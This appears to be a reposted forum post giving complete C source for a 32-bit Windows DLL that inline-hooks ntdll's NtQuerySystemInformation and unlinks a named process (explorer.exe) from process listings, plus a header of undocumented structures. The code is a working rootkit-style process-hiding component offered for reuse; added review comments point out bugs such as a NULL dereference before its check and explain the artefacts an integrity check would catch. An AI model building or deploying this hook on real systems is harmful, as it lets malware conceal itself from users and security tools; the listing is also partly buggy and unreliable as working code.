
[c] Process Hiding


[c] Process Hiding

Author: stdio

I didn't really see a good C example, so I decided to share my DLL that hooks NtQuerySystemInformation and hides explorer.exe.

#include <Windows.h>
#include "sysinfo.h"

// The 5 bytes found at the start of ntdll!NtQuerySystemInformation before PlaceHook
// overwrites them with a jmp. Filled by PlaceHook, copied into the trampoline, and
// written back by UnHook. Static storage, so it is all-zero until PlaceHook runs.
BYTE OrigBytes[5];
// Image name that HookedNtQuerySystemInformation drops from SystemProcessInformation
// results (compared case-sensitively with lstrcmpW against ProcessName.Buffer).
WCHAR g_TargetProc[] = L"explorer.exe";

/*
 * Trampoline through which the hook reaches the real NtQuerySystemInformation.
 * __declspec(naked) means no prologue/epilogue is emitted, so the function body
 * is exactly the three instructions below, and PlaceHook rewrites them in place:
 *   bytes 0-4  : "mov eax, imm32" placeholder, replaced with OrigBytes (the
 *                5 bytes PlaceHook saved from the real export)
 *   bytes 5-9  : "mov ecx, imm32"; the imm32 at offset 6 is patched to the
 *                address of (real export + 5), i.e. the first instruction
 *                after the jmp that PlaceHook writes into ntdll
 *   bytes 10+  : "jmp ecx" continues execution inside ntdll
 * Until PlaceHook has run, calling this jumps to 0xcafebabe.
 * MSVC __asm is x86-only, so this listing is 32-bit only.
 * NOTE(review): this only works if the export's first 5 bytes are whole,
 * position-independent instructions; nothing verifies that against the
 * ntdll build actually loaded — confirm before use.
 */
__declspec(naked) NTSTATUS NTAPI OriginalNtQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
)
{
__asm
{
mov eax, 0dfh // 5-byte placeholder; PlaceHook overwrites it with OrigBytes
mov ecx, 0xcafebabe // imm32 at offset 6 is patched by PlaceHook to (export + 5)
jmp ecx // resume in ntdll just past the inline jmp
}
}

/*
 * Replacement for NtQuerySystemInformation. Calls the real function through the
 * trampoline, then, for SystemProcessInformation only, unlinks every record whose
 * ProcessName equals g_TargetProc by adding its NextEntryDelta to the previous
 * record's delta, so a caller walking the chain steps over it. All other
 * information classes are returned untouched.
 *
 * Returns whatever the real call returned (Result is never altered).
 *
 * NOTE(review): the buffer is walked regardless of Result; when the real call
 * fails (for example a too-small buffer) SystemInformation does not hold valid
 * records. ProcessName.Buffer is handed to lstrcmpW without a NULL check.
 */
NTSTATUS NTAPI HookedNtQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
)
{
NTSTATUS Result;
PSYSTEM_PROCESSES pSystemProcess; // record before pNextSystemProcess (its delta is what gets rewritten)
PSYSTEM_PROCESSES pNextSystemProcess; // record currently being tested

// Always let the real call populate the buffer first.
Result = OriginalNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);

switch(SystemInformationClass)
{

case SystemProcessInformation:

pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
// NextEntryDelta is a byte offset from the start of one record to the next.
pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);

// A delta of 0 marks the last record, which terminates the walk.
while(pNextSystemProcess->NextEntryDelta != 0)
{
if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer,g_TargetProc)==0){
// Skip the matching record: the predecessor now points past it.
pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
}
pSystemProcess = pNextSystemProcess;
pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
}
break;

}

return Result;

}


/*
 * Installs an inline hook (5-byte relative jmp) on ntdll!NtQuerySystemInformation
 * so calls land in HookedNtQuerySystemInformation, and completes the
 * OriginalNtQuerySystemInformation trampoline so the hook can call through.
 *
 * Returns 0 on success, 1 when the export cannot be resolved.
 * Side effects: saves the export's first 5 bytes in OrigBytes (needed by UnHook)
 * and writes into two executable pages. No VirtualProtect result is checked.
 *
 * Artefacts this leaves for an integrity check: the export's first byte becomes
 * 0xE9, and both the ntdll code page and this DLL's stub page are toggled to
 * PAGE_EXECUTE_READWRITE; comparing the in-memory export prologue with the
 * on-disk image of ntdll exposes the patch.
 */
DWORD PlaceHook()
{
DWORD oldProtect;
LPVOID sourceFunction; // the real export inside ntdll
LPVOID destFunction; // our replacement
LPVOID stubFunction; // trampoline whose first bytes are rewritten below

destFunction = HookedNtQuerySystemInformation;
stubFunction = OriginalNtQuerySystemInformation;

// ANSI GetModuleHandle: this only compiles in a non-UNICODE build.
sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
// NOTE(review): OrigBytes is read through sourceFunction before the NULL check
// below, so a failed lookup dereferences NULL here instead of returning 1.
CopyMemory(OrigBytes,sourceFunction,sizeof(BYTE)*5);

if(sourceFunction == NULL){
return 1;
}

// PatchStub: bytes 0-4 <- saved original bytes; the imm32 at offset 6 <- address
// of (export + 5), the instruction that follows the jmp written into ntdll below.
// The 9-byte protect range covers offsets 0-8 while the pointer store at +6
// touches offsets 6-9; that relies on the stub not straddling a page boundary there.
VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect);
CopyMemory(stubFunction,OrigBytes,sizeof(BYTE)*5);
*(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5);
VirtualProtect(stubFunction, 9, oldProtect, &oldProtect);

// PatchSource: E9 rel32, with rel32 measured from the end of the 5-byte instruction.
// The LPVOID-sized store writes sizeof(LPVOID) bytes, which equals the 4-byte rel32
// only on x86 (consistent with the x86-only __asm trampoline).
VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
*(LPBYTE)sourceFunction = 0xE9;
*(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5));
VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect);

return 0;
}

/*
 * Removes the inline jmp by writing the 5 bytes saved in OrigBytes back over the
 * start of ntdll!NtQuerySystemInformation. Re-resolves the export rather than
 * reusing the address PlaceHook found. No return value; GetProcAddress and
 * VirtualProtect results are not checked, and nothing stops this running before
 * PlaceHook has filled OrigBytes (which would write five zero bytes into ntdll).
 */
void UnHook()
{
DWORD oldProtect;

LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
CopyMemory(addr,OrigBytes,sizeof(BYTE)*5); // restore the original prologue
VirtualProtect(addr, 5, oldProtect, &oldProtect);
}



/*
 * DLL entry point: installs the NtQuerySystemInformation hook when the DLL is
 * mapped into a process and removes it when the DLL is unloaded. Thread
 * attach/detach notifications do nothing. The value PlaceHook returns is
 * ignored, so a failed install is not reported to the loader; the function
 * always returns TRUE. hinstDLL and lpvReserved are unused.
 */
BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){
    if (dwReason == DLL_PROCESS_ATTACH) {
        PlaceHook();
    } else if (dwReason == DLL_PROCESS_DETACH) {
        UnHook();
    }
    return TRUE;
}

And the header:

#ifndef __SYSINFO_H__
#define __SYSINFO_H__

// NTSTATUS is defined here only if an SDK header has not already provided it
// (the #ifndef guards against a redefinition). NT_SUCCESS is the usual
// "non-negative status means success" test and STATUS_SUCCESS is 0; neither
// macro is used by the hook itself, which returns the real call's status unchanged.
#ifndef NTSTATUS
#define NTSTATUS LONG
#endif

#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_SUCCESS 0x00000000

/*
 * Information classes accepted by NtQuerySystemInformation. Values come from
 * position (first enumerator is 0), so the order must not be changed; the hook
 * only looks at SystemProcessInformation (value 5). The spelling of
 * SystemPrioritySeperation is an identifier and is kept as is.
 */
typedef enum _SYSTEM_INFORMATION_CLASS {

SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation, // value 5: the only class HookedNtQuerySystemInformation inspects
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation,
SystemLocksInformation,
SystemStackTraceInformation,
SystemPagedPoolInformation,
SystemNonPagedPoolInformation,
SystemHandleInformation,
SystemObjectInformation,
SystemPageFileInformation,
SystemVdmInstemulInformation,
SystemVdmBopInformation,
SystemFileCacheInformation,
SystemPoolTagInformation,
SystemInterruptInformation,
SystemDpcBehaviorInformation,
SystemFullMemoryInformation,
SystemLoadGdiDriverInformation,
SystemUnloadGdiDriverInformation,
SystemTimeAdjustmentInformation,
SystemSummaryMemoryInformation,
SystemNextEventIdInformation,
SystemEventIdsInformation,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemExtendServiceTableInformation,
SystemPrioritySeperation,
SystemPlugPlayBusInformation,
SystemDockInformation,
SystemPowerInformation1,
SystemProcessorSpeedInformation,
SystemCurrentTimeZoneInformation,
SystemLookasideInformation

} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;

/*
 * Counted wide string (Length/MaximumLength are byte counts, Buffer is not
 * guaranteed NUL-terminated). Declared under both the LSA_ and plain UNICODE_STRING
 * names. The hook passes ProcessName.Buffer straight to lstrcmpW, which assumes
 * a terminator the structure itself does not promise.
 */
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
}LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;

// CONST applied to the pointer typedef makes the pointer itself const, not the
// pointee (it is not "pointer to const UNICODE_STRING"). Unused by this listing.
typedef CONST PUNICODE_STRING PCUNICODE_STRING;

// Thread/process priority value used in SYSTEM_THREADS and SYSTEM_PROCESSES.
typedef LONG KPRIORITY;

/*
 * Per-process memory counters embedded in SYSTEM_PROCESSES. Only its size
 * matters to this listing (it fixes the offset of the fields after it); no
 * field is read by the hook.
 */
typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS;

/*
 * Process/thread id pair embedded in SYSTEM_THREADS.
 * NOTE(review): both ids are declared as DWORD (4 bytes) here; the SDK
 * declares them HANDLE-sized, so this matches the 32-bit layout only — confirm
 * against the target build before relying on offsets past this point.
 */
typedef struct _CLIENT_ID {
DWORD UniqueProcess;
DWORD UniqueThread;
} CLIENT_ID;

/*
 * One thread record; SYSTEM_PROCESSES ends with an array of these. Not read by
 * the hook — it only affects the size of a process record, which NextEntryDelta
 * already encodes.
 */
typedef struct _SYSTEM_THREADS {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREADS, * PSYSTEM_THREADS;

/*
 * One record of the SystemProcessInformation buffer as this header lays it out.
 * Records are chained by NextEntryDelta, the byte offset from the start of this
 * record to the next (0 on the last record); that field is what the hook walks
 * and rewrites, and ProcessName.Buffer is what it compares with g_TargetProc.
 * Threads[1] is the classic trailing variable-length array. IO_COUNTERS comes
 * from Windows.h.
 * NOTE(review): field widths (DWORD ids in CLIENT_ID, ULONG process ids) look
 * like the 32-bit structure; confirm against the target OS before trusting any
 * offset here.
 */
typedef struct _SYSTEM_PROCESSES {
ULONG NextEntryDelta; // byte offset to the next record; 0 terminates the list
ULONG ThreadCount;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName; // image name the hook matches against g_TargetProc
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
SYSTEM_THREADS Threads[1];
} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;



/*
 * Function-pointer type matching NtQuerySystemInformation's signature. Not
 * referenced by the listing above (the hook uses a naked trampoline instead).
 * The name starts with a double underscore, which C reserves for the
 * implementation; the same applies to the __SYSINFO_H__ include guard.
 */
typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);

#endif

Sursa: [c] Process Hiding
